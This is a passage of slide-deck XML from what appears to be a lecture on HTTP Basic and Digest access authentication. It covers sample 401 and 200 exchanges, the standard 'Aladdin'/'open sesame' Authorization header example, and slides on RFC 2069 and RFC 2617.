            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2640013" y="4797426"/>
            <a:ext cx="68897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2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>www.somesite.com/animalsearch?monkeys&amp;banana</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="it-IT" sz="1600">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49"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olo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E78BD82B-838A-4393-BFE5-C9CD80A70D63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1"/>
              <a:t>Disadvantages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91139" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50C227A0-669C-4864-908B-0ABE4D2364B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>It relies on the assumption that the connection between the client and server computers is secure and can be trusted </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>if SSL/TLS is not used, then the credentials are passed as plaintext</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>there is no effective way for a server to "log out" the user without closing the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="it-IT" altLang="it-IT" u="sng"/>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olo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72906D12-5A8D-4873-B519-966E8C6047E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1"/>
              <a:t>Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F4E7DE1-4FA9-4B11-821C-53BD29C812F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The client requests a page that requires authentication but does not provide a user name and password </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the server responds with the 401 ("Unauthorized") response code, including the required authentication scheme and the authentication realm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the client will present the authentication realm (typically a description of the computer or system being accessed) to the user and prompt for a user name and password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>once the user has supplied a user name and password, the client adds an Authorization header (with valuebase64encode(username+":"+password)) to the original request and re-sends it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the server accepts the authentication and the page is returned; if the user name is invalid or the password incorrect, the server might return the 401 response code</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"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olo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBEC1A15-798F-4AD7-ABDC-8A3E83E78009}"/>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95235" name="Rettangolo 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADFD9876-B318-47BB-AF33-4B3FF0FC6475}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2238375" y="1571625"/>
            <a:ext cx="353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Client request (no authentication)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95236" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0286CB40-1178-45E4-A195-92D31E765FE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2238375" y="2071689"/>
            <a:ext cx="4286250" cy="276225"/>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/private/index.html HTTP/1.0 Host: localhost </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT" sz="2800">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95237" name="Rettangolo 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E13A73E7-2D6D-4F95-AF9E-5FE40CE7C4F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2238376" y="27146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Server response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95238" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAEBA924-90D1-45DD-B1F3-9BC1555F4232}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2238375" y="3160713"/>
            <a:ext cx="6000750" cy="3046412"/>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HTTP/1.0 401 Authorization Required </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Server: HTTPd/1.0 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Date: Sat, 27 Nov 2004 10:18:15 GMT </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>WWW-Authenticate: Basic realm="Secure Area" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Content-Type: text/html </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Content-Length: 311 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" altLang="it-IT" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="12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200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>&lt;HTML&gt;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&lt;TITLE&gt;Error&lt;/TITLE&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="12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200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>&lt;/HEAD&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="12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200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>&lt;/HTML&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT" sz="2800">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin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F7C81CE0-A0FB-4A2F-B7C7-2CD07CD1DC59}"/>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97283" name="Rettangolo 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA467D8A-8C4E-466C-9136-5DF56A6E669A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1952625" y="1714500"/>
            <a:ext cx="62865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b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Client request (user name "Aladdin", password "open sesame")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97284" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DB9083D-085E-40FE-B1D7-DF1194007B93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2024063" y="2214564"/>
            <a:ext cx="5143500" cy="7381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400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>GET /private/index.html HTTP/1.0 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Host: localhost </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ== </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97285" name="Rettangolo 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B83C8E49-E719-4A4F-82D2-7FAF45957822}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2095501" y="328612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Server response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97286" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1220B413-51D1-4625-8DB1-248D58A3B88D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2095501" y="3929064"/>
            <a:ext cx="4143375" cy="954087"/>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400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>HTTP/1.0 200 OK Server: HTTPd/1.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> Date: Sat, 27 Nov 2004 10:19:07 GMT </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Content-Type: text/html </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Content-Length: 10476 </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>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206C67-113F-4B19-BA08-0997D8DDD863}"/>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err="1"/>
              <a:t>Digest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>authentication</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99331" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{796AADE2-8723-40BC-854A-B09F4694E152}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>Used to negotiate credentials with a user's web browser  (using HTTP protocol). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>It applies a hash function to a password before sending it over the network, which is safer than basic access authentication, which sends plaintext</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>It is an application of MD5 cryptographic hashing with usage of nonce values to prevent cryptanalysis</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>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4676E431-02CD-4AB9-9A8E-9AA94747987B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>RFC 2069</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="101379" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{627606BD-8D8E-4352-A38C-A03B70C07A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9813" y="2643188"/>
            <a:ext cx="6629400"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0" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22F8DB5-603C-4EF6-A26F-999EA80519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9813" y="3000376"/>
            <a:ext cx="55689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1" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{899887D6-1A39-4529-8DB2-5D7FDCB146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814" y="3429001"/>
            <a:ext cx="4351337"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6C3C5A9F-CA1E-4FD6-9C4C-5286765EDEA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>RFC 2617</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="103427" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCF223EE-FF13-4F82-AB24-67FC5E9A1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1571626"/>
            <a:ext cx="46101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Rettangolo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50EDDE1A-3D70-4CC8-942C-24E83D88236D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2024064" y="2071689"/>
            <a:ext cx="86439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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
